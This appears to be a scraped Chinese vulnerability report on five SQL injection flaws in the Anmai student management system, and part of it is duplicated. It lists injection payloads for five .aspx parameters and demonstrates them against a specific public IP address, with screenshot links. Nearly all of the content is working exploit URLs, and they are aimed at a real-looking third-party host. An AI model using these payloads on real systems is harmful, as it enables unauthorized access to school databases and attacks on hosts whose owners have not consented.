VULHUB ™

### 简要描述： 安脉学生综合管理系统5处SQL注入漏洞 ### 详细说明： 5处利用payload分别如下 ``` /Asset/Device/DeviceLeadInfo_View.aspx?LeadID=1 and @@version=1 /Asset/Device/DeviceLeadSearch.aspx?hidsearch=search&outstoreid=1' and @@version=1-- /Asset/Device/DeviceRebuildInfo_View.aspx?DeviceRebuildID=1' and @@version=1-- /Asset/Device/DeviceSort_Lead_Detail.aspx?prepareNo=1' and @@version=1-- /Asset/Device/DeviceSort_Lead_OK.aspx?hid_prepareno=1' and @@version=1-- ``` ### 漏洞证明： 以 http://218.22.96.74:8899 为例进行演示 http://218.22.96.74:8899/Asset/Device/DeviceLeadInfo_View.aspx?LeadID=1 and @@version=1 [<img src="https://images.seebug.org/upload/201504/10145129312cd170a6e3c009b74fd9e65d192d9d.jpg" alt="QQ截图20150410145627.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/10145129312cd170a6e3c009b74fd9e65d192d9d.jpg) http://218.22.96.74:8899/Asset/Device/DeviceLeadSearch.aspx?hidsearch=search&outstoreid=1' and @@version=1-- [<img...

### 简要描述： 安脉学生综合管理系统5处SQL注入漏洞 ### 详细说明： 5处利用payload分别如下 ``` /Asset/Device/DeviceLeadInfo_View.aspx?LeadID=1 and @@version=1 /Asset/Device/DeviceLeadSearch.aspx?hidsearch=search&outstoreid=1' and @@version=1-- /Asset/Device/DeviceRebuildInfo_View.aspx?DeviceRebuildID=1' and @@version=1-- /Asset/Device/DeviceSort_Lead_Detail.aspx?prepareNo=1' and @@version=1-- /Asset/Device/DeviceSort_Lead_OK.aspx?hid_prepareno=1' and @@version=1-- ``` ### 漏洞证明： 以 http://218.22.96.74:8899 为例进行演示 http://218.22.96.74:8899/Asset/Device/DeviceLeadInfo_View.aspx?LeadID=1 and @@version=1 [<img src="https://images.seebug.org/upload/201504/10145129312cd170a6e3c009b74fd9e65d192d9d.jpg" alt="QQ截图20150410145627.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/10145129312cd170a6e3c009b74fd9e65d192d9d.jpg) http://218.22.96.74:8899/Asset/Device/DeviceLeadSearch.aspx?hidsearch=search&outstoreid=1' and @@version=1-- [<img src="https://images.seebug.org/upload/201504/101455215556b407254286d96c7a6cf5508684c6.jpg" alt="QQ截图20150410145716.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/101455215556b407254286d96c7a6cf5508684c6.jpg) http://218.22.96.74:8899/Asset/Device/DeviceRebuildInfo_View.aspx?DeviceRebuildID=1' and @@version=1-- [<img src="https://images.seebug.org/upload/201504/10145557fba77d7b59c244df3a71af945e010525.jpg" alt="QQ截图20150410150056.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/10145557fba77d7b59c244df3a71af945e010525.jpg) http://218.22.96.74:8899/Asset/Device/DeviceSort_Lead_Detail.aspx?prepareNo=1' and @@version=1-- [<img src="https://images.seebug.org/upload/201504/10145746c5476949840ce29f13fa41151337cf88.jpg" alt="QQ截图20150410150243.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/10145746c5476949840ce29f13fa41151337cf88.jpg) http://218.22.96.74:8899/Asset/Device/DeviceSort_Lead_OK.aspx?hid_prepareno=1' and @@version=1-- [<img src="https://images.seebug.org/upload/201504/10145834e62292aa0c78e825c4052e9b8a19df40.jpg" alt="QQ截图20150410150330.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/10145834e62292aa0c78e825c4052e9b8a19df40.jpg)